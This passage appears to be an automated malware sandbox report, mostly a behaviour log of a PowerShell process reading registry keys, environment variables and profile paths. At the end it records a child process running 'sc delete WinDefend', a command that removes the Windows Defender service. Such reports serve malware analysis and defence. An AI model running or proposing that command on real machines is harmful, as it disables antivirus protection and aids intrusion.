Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
User	Get Username	user_name_out = 2XC7u663GxWc	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = 2XC7u663GxWc	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = 2XC7u663GxWc	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = HOMEDRIVE, result_out = C:	1	Fn
Environment	Get Environment String	name = HOMEPATH, result_out = \Users\2XC7u663GxWc	1	Fn
File	Get Info	filename = C:\Users\2XC7u663GxWc, type = file_attributes	1	Fn
File	Get Info	filename = C:\, type = file_attributes	4	Fn
User	Get Username	user_name_out = 2XC7u663GxWc	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = 2XC7u663GxWc	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = 2XC7u663GxWc	2	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
User	Get Username	user_name_out = 2XC7u663GxWc	1	Fn
Environment	Get Environment String	name = MshEnableTrace	5	Fn
File	Get Info	filename = C:\Windows\system32, type = file_attributes	2	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
File	Get Info	filename = C:\, type = file_attributes	2	Fn
File	Get Info	filename = C:\Windows, type = file_attributes	2	Fn
File	Get Info	filename = C:\Windows\system32, type = file_attributes	2	Fn
File	Get Info	filename = C:\Windows, type = file_attributes	2	Fn
File	Get Info	filename = C:\Windows\system32, type = file_attributes	3	Fn
User	Get Username	user_name_out = 2XC7u663GxWc	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Environment	Get Environment String	name = HomeDrive, result_out = C:	1	Fn
Environment	Get Environment String	name = HomePath, result_out = \Users\2XC7u663GxWc	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	11	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\2XC7u663GxWc\Documents\WindowsPowerShell\profile.ps1, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\2XC7u663GxWc\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	7	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = 2XC7u663GxWc	1	Fn

Thread 0xf30

Category	Operation	Information	Success	Count	Logfile
Module	Unmap	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe		1	Fn

Thread 0x8c8

136

Category	Operation	Information	Count	Logfile
Environment	Get Environment String	name = MshEnableTrace	19	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PATH	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = MshEnableTrace	9	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	2	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Write	filename = CONOUT$, size = 79	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 79	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 62	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 17	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 57	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 79	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 25	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 54	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data

Process #13: sc.exe

Information	Value
ID	#13
File Name	c:\windows\system32\sc.exe
Command Line	sc delete WinDefend
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:00:46, Reason: Child Process
Unmonitor	End Time: 00:00:47, Reason: Self Terminated
Monitor Duration	00:00:00

OS Process Information

Information	Value
PID	0xf14
Parent PID	0xedc (c:\windows\system32\cmd.exe)
Bitness	32-bit
Is Created or Modified Executable
